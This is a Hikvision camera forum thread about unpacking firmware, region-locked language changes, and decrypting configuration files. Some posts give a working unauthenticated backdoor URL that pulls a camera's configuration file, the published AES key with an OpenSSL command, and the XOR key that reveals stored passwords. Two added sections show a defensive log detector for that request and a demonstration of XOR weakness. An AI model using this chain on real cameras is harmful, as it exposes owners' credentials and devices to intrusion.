Hikvision FIRMWARE TOOLS - change language, extract files and create own firmware

Discussion in 'Hikvision' started by wzhick, Feb 25, 2015.

  1. habeschi

    habeschi n3wb

    Joined:
    Oct 27, 2017
    Messages:
    21
    Likes Received:
    0
    I used this command to extract the dav file

    test@test-VirtualBox:~$ ./hikpack -t k41 -i digicap.dav -o contents
    Magic : 484b5753
    hdr_crc : 00001d1a (OK)
    lang_id : 00000001
    date_hex: 20150315
    devclass: 00000043
    File: cramfs.img, CRC OK
    WARN: missing new_20.bin trailer file
    Extra tail at the end of dav, 29082624 bytes, maybe firmware id?
    ------------------------------------------------
    The problem is I don't know which type of firmware I have. I just tried k41 and know it works. I can decrypt the tar.lzma files.

    I use this command:

    test@test-VirtualBox:~$ ./hikpack -t k41 -d webs.tar.lzma -o decrypted/webs.tar.lzma

    By the way: can I use firmware from Hikvision to update this OEM DVR?
    Because I have a new product type and there is no firmware update available and I can't activate SSH on the DVR.
    My main intention is to change the logo which is shown if no camera is connected.
     
  2. alastairstevenson

    alastairstevenson Staff Member

    Joined:
    Oct 28, 2014
    Messages:
    11,267
    Likes Received:
    3,586
    Location:
    Scotland
    I'm sorry but I don't know the answer to that question - too many unknowns.
     
  3. moh_kasab

    moh_kasab n3wb

    Joined:
    Jan 14, 2018
    Messages:
    3
    Likes Received:
    0
    Hello all,
    I am new to this firmware stuff, so please help me.
    I want to modify the DVR firmware so that I can add new pages to the web interface that sends serial output (RS232).
    How can you do it?
    I tried to create my own firmware, and here are the steps:
    1- used hiktools with digicap.dav so I got cramfs.img
    2- used 7-zip with cramfs.img so that I got webs.tar.lzma

    Now how can I open webs.tar.lzma? And if I added more pages, do I need to modify any files? Finally, how can I repack the digicap.dav?

    thx in advance
     
  4. alastairstevenson

    alastairstevenson Staff Member

    The firmware files are encrypted.
    That is quite a complicated topic that needs quite a lot of knowledge and experience - far too much to be simply answered in a post on a forum.
     
  5. moh_kasab

    moh_kasab n3wb

    alastairstevenson, thank you for your reply.

    Where can I learn editing firmware or creating firmware? I really want to learn it.

    thx again
     
  6. alastairstevenson

    alastairstevenson Staff Member

    Maybe not specifically for Hikvision devices - but the same principles apply - there are loads of resources on the internet on the subject, try these google searches for example :
    reverse engineering embedded systems
    how to unpack and repack cramfs images
     
  7. masztalski76

    masztalski76 n3wb

    Joined:
    Jul 21, 2016
    Messages:
    1
    Likes Received:
    0
    Hi,
    I'm new here and need your help.
    I have the Hikvision DS-2CD2232-I5 Chinese cam with the original hacked international/English firmware from provider: V5.2.5 build 141201.
    Is there a way to update the firmware to the current official version: IPC - DS-2xx2_5.4.5_170123?
    Maybe by modifying the language flag or something else in the version?
    Alternatively, can somebody provide me the hacked English version 5.4.5 for the Chinese cam?

    Thank you very much in advance for your answer and support.
     
  8. alastairstevenson

    alastairstevenson Staff Member

    Yes, there is, if you are willing and able to follow some steps.
    Lots of people have had good success with this :

    Unbrick and fully upgrade your R0 / DS-2CD2x32 IP cameras -
    R0 / DS-2CD2x32 BrickfixV2 brick recovery and full upgrade tool - enhanced.

    Make sure to run the 'prtHardInfo' command at the shell prompt to confirm the devType of your specific camera.

    *edit* And the needed R0 5.4.5 firmware is here : DOWNLOAD PORTAL
     
    Last edited: Jan 31, 2018
  9. Alisukov

    Alisukov n3wb

    Joined:
    Mar 3, 2018
    Messages:
    4
    Likes Received:
    1
    Location:
    Russia
    Good afternoon, tell me how to open (decrypt) the configuration file of the Hikvision DS-2CD2032-I camera firmware V5.1.2. Thank you
     
  10. alastairstevenson

    alastairstevenson Staff Member

    OK - assuming that old firmware protects the exported configuration file in the same way as the more recent firmware - and also as the encryption passphrase has been openly published in the CVE associated with the 'plaintext passwords in configuration file' vulnerability, you can use command-line OpenSSL to decrypt the configuration file as follows:
    Code:
    openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
    
    Then if you inspect the result with a hex editor you will see clearly that there is a 4-byte XOR encode operation needed to complete the process.
    It's quite bizarre why any developer at Hikvision thinks it would be useful to just do a straight XOR of the data - there may be a reason, but it's not obvious to me.
     
  11. David101

    David101 n3wb

    Joined:
    Mar 7, 2018
    Messages:
    2
    Likes Received:
    0
    Hello everyone,
    I am new to the forum and IP cameras.

    I bought a Hikvision NVR off eBay, the language is Chinese, I can't find English on the drop down menu.

    Here are the NVR details

    DS 7608N-E2/8P
    Serial **********AARR*********WCVU
    Master version V3.0.10 build 141126
    Coding version: V5.0 build 140816


    I got some questions if someone can hopefully answer.


    1) Is my NVR Chinese? I know it has RR in the serial but Chinese is the only language on the menu.

    2) Can I change the language to English?
    Any guide for dummies would be appreciated.

    3) I haven't bought any camera yet, but would I need to buy a Chinese camera or European or international to prevent a language mismatch?

    4) Is it possible to update the firmware to English without bricking the NVR?


    I know I have asked a lot but I am new to this so I am trying to figure this all out.


    Thanks in advance.
     
  12. alastairstevenson

    alastairstevenson Staff Member

    Was the language advised in the eBay listing?
    If 'not as described' it might be easiest to return it.
    The alternative is to install hacked firmware.
    It's likely you will get the 15-beep bootloop "!!!You device is illegal !!! !!!You bought in China!!! !!!You must call factory!!!" or words to that effect.
    Bricked as good as.
     
  13. David101

    David101 n3wb


    Thanks for the reply

    Is there a guide to installing a hacked firmware?
     
  14. Alisukov

    Alisukov n3wb

    Thanks that responded to help, I'm not such an advanced user
    Your phrase
    you can use the -line OpenSSL command to decrypt the configuration file as follows:
    I understand that this is an SSL request. And it is possible to open the configuration file without accessing the camera
     
    Last edited: Mar 8, 2018
  15. alastairstevenson

    alastairstevenson Staff Member

    It's actually an AES decryption command - it just happens to be part of the large suite of facilities under the OpenSSL software.
    A configuration file can be extracted from a camera by exploiting the 'Hikvision backdoor' vulnerability for cameras with firmware no later than 5.4.41 *edit* earlier than 5.4.41 (and I forget what early version is vulnerable).
    There is an HTTP example somewhere of how to extract a configuration file without requiring a password.
     
    Last edited: Mar 8, 2018
  16. alastairstevenson

    alastairstevenson Staff Member

    This is all in the public domain:

    Here is the HTTP example that can be used against a Hikvision camera without knowing the logon credentials :
    Code:
    http://<camera_IP_address>/System/configurationFile?auth=YWRtaW46MTEK
    Then use the command
    Code:
    openssl enc -d -in configurationFile -out decryptedoutput -aes-128-ecb -K 279977f62f6cfd2d91cd75b889ce0c9a -nosalt -md md5
    This results in a file that is statically XOR encoded and is obvious by inspection of the contents.
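
Added example, not part of the original posts: a log check a defender could run to see whether the request shape shown above has reached their cameras. It assumes an access log in combined format from a reverse proxy or firewall in front of the device; the log lines, addresses and function names are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [09/Mar/2018:10:01:02 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 200 45120 "-" "curl/7.58.0"
198.51.100.23 - - [09/Mar/2018:10:02:10 +0000] "GET /index.html HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Mar/2018:10:03:44 +0000] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 401 0 "-" "curl/7.58.0"
192.0.2.50 - - [09/Mar/2018:10:05:00 +0000] "GET /search?auth=none HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def looks_like_url_credentials(value):
    """True if the parameter is base64 that decodes to 'user:password' text."""
    try:
        # parse_qs turns '+' into a space; undo that before decoding.
        text = base64.b64decode(value.replace(" ", "+"), validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return False
    return ":" in text.strip()

def find_auth_param_requests(log_text):
    """Return one finding per request carrying base64 credentials in ?auth=."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not any(looks_like_url_credentials(v)
                   for v in parse_qs(url.query).get("auth", [])):
            continue
        findings.append({
            "src": m["src"], "time": m["ts"], "path": url.path,
            "status": int(m["status"]),
            # A 200 on this path means the configuration file left the device.
            "config_exported": url.path.endswith("/configurationFile")
                               and m["status"] == "200",
        })
    return findings

if __name__ == "__main__":
    for finding in find_auth_param_requests(SAMPLE_LOG):
        print(finding)
```

A finding with `config_exported` set means the credentials stored on that device should be treated as disclosed and changed after the firmware is updated.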
     
  17. Alisukov

    Alisukov n3wb

    Thank you for directing in the right direction, about the first one I knew that without knowing the login credentials you can get a configuration and a screenshot, etc. On your command received a file decryptedoutput I'm sorry that it's dull, and what this file is decoded. When you open the notebook (L "¤ G_ђ_DrЉFD: uu2 2 2 <UDs <UDs <UDs <UDs <UDs <UDq" WD + <UDr <UDl <UDs <UD) that's what it writes.
    You can expand on your words-
    "This results in a file that is statically encoded by XOR and is obvious by checking the contents"Configuration_File
    Thanks
     
    Last edited: Mar 9, 2018
  18. alastairstevenson

    alastairstevenson Staff Member

    Remember that this is a binary file - so it cannot be opened with a text editor or similar.
    To examine it you would need a hex editor or hex dump program.
    This is a hex view of the decrypted output of your first configuration file, using the Linux wxHexEditor :
    upload_2018-3-10_10-30-25.png
    As the file is fairly sparse, has a lot of nulls in it, you can see by inspection what the simple XOR hex key would be - 73 8B 55 44
    There are various tools that would do an XOR decode of the file - but it just happens that wxHexEditor has a handy XOR 'view through' function.
    upload_2018-3-10_10-42-14.png

    And this is the result when it is applied :

    upload_2018-3-10_10-44-56.png
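
Added example, not part of the original posts: why a repeating XOR over a sparse file protects nothing. Wherever the plaintext byte is 0x00 the stored byte is the key byte itself, so the most common byte at each position modulo the key length is the key. The buffer below is constructed (it is not a real configuration file), the function names are hypothetical, and the 4-byte period and key value are the ones stated in the post above.

```python
from collections import Counter

def recover_xor_key(data: bytes, key_len: int = 4):
    """Return (key, confidence) for a repeating XOR key over sparse data.

    confidence is the fraction of bytes equal to the recovered key byte at
    their position; a low value means the data is not mostly nulls and the
    guess should not be trusted.
    """
    if len(data) < key_len:
        raise ValueError("need at least one full key period")
    key, agreeing = bytearray(), 0
    for offset in range(key_len):
        value, count = Counter(data[offset::key_len]).most_common(1)[0]
        key.append(value)
        agreeing += count
    return bytes(key), agreeing / len(data)

def xor_decode(data: bytes, key: bytes) -> bytes:
    """Apply the repeating key; XOR is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Constructed stand-in for a sparse binary record: mostly nulls, a few fields.
PLAIN = bytearray(256)
PLAIN[16:21] = b"admin"
PLAIN[48:60] = b"examplepass1"
PLAIN[96:106] = b"192.0.2.10"
PLAIN = bytes(PLAIN)

# Obfuscate with the key quoted in the post above (73 8B 55 44).
OBFUSCATED = xor_decode(PLAIN, bytes.fromhex("738b5544"))

if __name__ == "__main__":
    key, confidence = recover_xor_key(OBFUSCATED)
    print(key.hex(), round(confidence, 3))
    print(xor_decode(OBFUSCATED, key)[16:21])
```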
     
  19. Alisukov

    Alisukov n3wb

    Thanks for helping to make it work.
     
    alastairstevenson likes this.
  20. alastairstevenson

    alastairstevenson Staff Member

    You are welcome.
    It's a big vulnerability - the ability to anonymously extract the configuration file and see the plaintext contents.
    I wonder how much this is being exploited over the internet for those Hikvision cameras that have been 'port forwarded' ?